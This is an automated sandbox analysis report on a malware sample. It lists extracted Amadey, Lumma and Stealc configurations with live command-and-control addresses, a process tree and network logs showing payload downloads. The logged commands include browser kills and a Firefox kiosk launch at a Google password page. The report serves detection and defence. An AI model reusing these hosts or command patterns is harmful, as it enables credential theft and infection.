Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    146s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08/12/2024, 18:35 UTC

General

  • Target

    ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe

  • Size

    3.1MB

  • MD5

    2b3dca9f3f8f7b379021a041b731aed3

  • SHA1

    e8fc7d977c0a76e25b1e69f4398a10fef83918d0

  • SHA256

    ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24

  • SHA512

    ce65473353253347788ed1d0641a6c6a3be815c50bd1046c1aa8bf827f48c0f09b61560f3aa3eeb8f641afa6d7a870dd68834615b3fe81b6f62a9ffee946f98a

  • SSDEEP

    49152:QGzTfwucejjjsjgACxGnlEaX+IWYxR8SJe2cC9/1+F0U:Bzb20jIjgACxNyWCR8S42cC9/1+z

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://se-blurry.biz/api

https://zinc-sneark.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 23 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe
    "C:\Users\Admin\AppData\Local\Temp\ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3064
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Users\Admin\AppData\Local\Temp\1013210001\B3vKvPi.exe
        "C:\Users\Admin\AppData\Local\Temp\1013210001\B3vKvPi.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:1792
        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\callmobile.exe
          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\callmobile.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:904
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 904 -s 616
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:2164
      • C:\Users\Admin\AppData\Local\Temp\1013229001\0tClIDb.exe
        "C:\Users\Admin\AppData\Local\Temp\1013229001\0tClIDb.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4900
      • C:\Users\Admin\AppData\Local\Temp\1013238001\wTMEVe8.exe
        "C:\Users\Admin\AppData\Local\Temp\1013238001\wTMEVe8.exe"
        3⤵
        • Executes dropped EXE
        PID:2068
      • C:\Users\Admin\AppData\Local\Temp\1013239001\ntRoEwh.exe
        "C:\Users\Admin\AppData\Local\Temp\1013239001\ntRoEwh.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:1964
        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callmobile.exe
          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callmobile.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1592
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 616
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:2532
      • C:\Users\Admin\AppData\Local\Temp\1013244001\78c83a40ec.exe
        "C:\Users\Admin\AppData\Local\Temp\1013244001\78c83a40ec.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1152
      • C:\Users\Admin\AppData\Local\Temp\1013245001\2427caf3c8.exe
        "C:\Users\Admin\AppData\Local\Temp\1013245001\2427caf3c8.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3396
      • C:\Users\Admin\AppData\Local\Temp\1013246001\8b0d03025f.exe
        "C:\Users\Admin\AppData\Local\Temp\1013246001\8b0d03025f.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1984
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3128
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3676
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4108
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4624
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1288
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
            PID:2112
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
              5⤵
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:1864
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.0.625787387\785017775" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1148 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {43c1f451-3d88-4d13-bc6e-5b254a4b4fa3} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 1280 110cd858 gpu
                6⤵
                  PID:3316
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.1.1882327981\1688474253" -parentBuildID 20221007134813 -prefsHandle 1468 -prefMapHandle 1464 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b727aff5-c87e-4bdf-8c4d-afba28885480} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 1480 f9f9258 socket
                  6⤵
                    PID:3664
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.2.1325577127\298489421" -childID 1 -isForBrowser -prefsHandle 1932 -prefMapHandle 1924 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2fc3d986-3753-483f-b035-36ccd3007353} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 2044 19cb4258 tab
                    6⤵
                      PID:2820
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.3.561170250\294802173" -childID 2 -isForBrowser -prefsHandle 2912 -prefMapHandle 2908 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {264e13ab-a1fc-4b9e-8126-4d21a4b8208e} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 2924 e62758 tab
                      6⤵
                        PID:4528
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.4.1027251155\693535121" -childID 3 -isForBrowser -prefsHandle 3732 -prefMapHandle 3736 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {44397423-8b64-4184-beec-32b36990a936} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 3380 1cdb0358 tab
                        6⤵
                          PID:1524
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.5.790233875\2115098238" -childID 4 -isForBrowser -prefsHandle 3840 -prefMapHandle 3844 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {88068e53-bb73-4586-921c-84cdef532381} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 3828 204c6b58 tab
                          6⤵
                            PID:2576
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.6.551785299\404286569" -childID 5 -isForBrowser -prefsHandle 4008 -prefMapHandle 4012 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90d84606-e499-4f64-99d3-bcddeda0ed18} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 3996 204c6258 tab
                            6⤵
                              PID:272
                      • C:\Users\Admin\AppData\Local\Temp\1013247001\dd94fa9303.exe
                        "C:\Users\Admin\AppData\Local\Temp\1013247001\dd94fa9303.exe"
                        3⤵
                        • Modifies Windows Defender Real-time Protection settings
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Windows security modification
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:684
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1013248041\KeaEfrP.ps1"
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4920

                  Network

                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 4
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:35:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 156
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:35:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    GET
                    http://31.41.244.11/files/6554834407/B3vKvPi.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/6554834407/B3vKvPi.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:35:21 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2343424
                    Last-Modified: Sun, 08 Dec 2024 16:02:55 GMT
                    Connection: keep-alive
                    ETag: "6755c32f-23c200"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://31.41.244.11/files/806475321/0tClIDb.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/806475321/0tClIDb.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:06 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1892352
                    Last-Modified: Sun, 08 Dec 2024 16:55:07 GMT
                    Connection: keep-alive
                    ETag: "6755cf6b-1ce000"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://31.41.244.11/files/7658082748/wTMEVe8.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/7658082748/wTMEVe8.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:15 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 4122624
                    Last-Modified: Sun, 08 Dec 2024 17:35:35 GMT
                    Connection: keep-alive
                    ETag: "6755d8e7-3ee800"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://31.41.244.11/files/6554834407/ntRoEwh.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/6554834407/ntRoEwh.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:27 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2343424
                    Last-Modified: Sun, 08 Dec 2024 17:50:38 GMT
                    Connection: keep-alive
                    ETag: "6755dc6e-23c200"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://31.41.244.11/files/5131681669/KeaEfrP.ps1
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/5131681669/KeaEfrP.ps1 HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:51 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2687
                    Last-Modified: Sun, 08 Dec 2024 18:34:47 GMT
                    Connection: keep-alive
                    ETag: "6755e6c7-a7f"
                    Accept-Ranges: bytes
                  • flag-us
                    DNS
                    atten-supporse.biz
                    78c83a40ec.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    atten-supporse.biz
                    IN A
                    Response
                    atten-supporse.biz
                    IN A
                    104.21.16.9
                    atten-supporse.biz
                    IN A
                    172.67.165.166
                  • flag-us
                    POST
                    https://atten-supporse.biz/api
                    0tClIDb.exe
                    Remote address:
                    104.21.16.9:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: atten-supporse.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=2p5b0sligbovtcopjt1upqiotp; expires=Thu, 03-Apr-2025 12:22:52 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uDonfhQaqHtbAgea9S0xdc7ENtclC%2BAE7FaI6uhUg95uGZjwc4%2BnWddEtuwDdrNxDyIEqdsmcyz7rZAMQpTbq6evNXc0A7hOa2MWeb5%2FcQXX5YVEDDtJOSemnrOzTCiV%2BdQgE2w%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedc1b0de1ef19-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=64265&min_rtt=55529&rtt_var=23235&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2863&recv_bytes=586&delivery_rate=53329&cwnd=248&unsent_bytes=0&cid=3aac789eed6d04c6&ts=283&x=0"
                  • flag-us
                    DNS
                    se-blurry.biz
                    78c83a40ec.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    se-blurry.biz
                    IN A
                    Response
                    se-blurry.biz
                    IN A
                    172.67.162.65
                    se-blurry.biz
                    IN A
                    104.21.81.153
                  • flag-us
                    POST
                    https://se-blurry.biz/api
                    0tClIDb.exe
                    Remote address:
                    172.67.162.65:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: se-blurry.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=2gmvlh6ugqaatcop55qhqn0784; expires=Thu, 03-Apr-2025 12:22:53 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wWFPYGNVUuFOQN8Dyf3CN217RxnIajd7QHjmVqrEZx2vORNiGWz1tFm9bQqnAn4rK8b2%2FpP%2F70wTc%2FVSiCHTJ6VzVpZFyk%2BhB151JdZdZ6pH2cq1kvsREBe9XFJAe8m6"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedc1d7c56950b-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=53990&min_rtt=47690&rtt_var=13471&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=581&delivery_rate=73139&cwnd=246&unsent_bytes=0&cid=1ad28a414aac9d1a&ts=268&x=0"
                  • flag-us
                    DNS
                    zinc-sneark.biz
                    78c83a40ec.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    zinc-sneark.biz
                    IN A
                    Response
                    zinc-sneark.biz
                    IN A
                    104.21.62.142
                    zinc-sneark.biz
                    IN A
                    172.67.136.167
                  • flag-us
                    POST
                    https://zinc-sneark.biz/api
                    0tClIDb.exe
                    Remote address:
                    104.21.62.142:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: zinc-sneark.biz
                    Response
                    HTTP/1.1 403 Forbidden
                    Date: Sun, 08 Dec 2024 18:36:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    X-Frame-Options: SAMEORIGIN
